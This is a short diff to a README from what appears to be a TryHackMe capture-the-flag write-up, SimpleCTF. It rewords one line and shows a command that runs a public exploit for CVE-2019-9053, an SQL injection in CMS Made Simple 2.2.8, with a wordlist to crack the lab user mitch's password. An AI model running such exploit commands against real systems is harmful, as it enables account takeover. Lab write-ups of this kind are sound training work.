SuGold/SuGold.github.io/THM Writeups/SimpleCTF/README.md

 It appears to be CMS Made Simple version 2.2.8 and it looks to be vulnerable to an SQL injection attack.
 More specifically, `CVE-2019-9053`

-Let's try and brute-force mitch's account using that exploit.
+Let's try and crack mitch's account using that exploit.

 `python2 46635.py -u http://10.10.166.73/simple/ --crack -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best110.txt`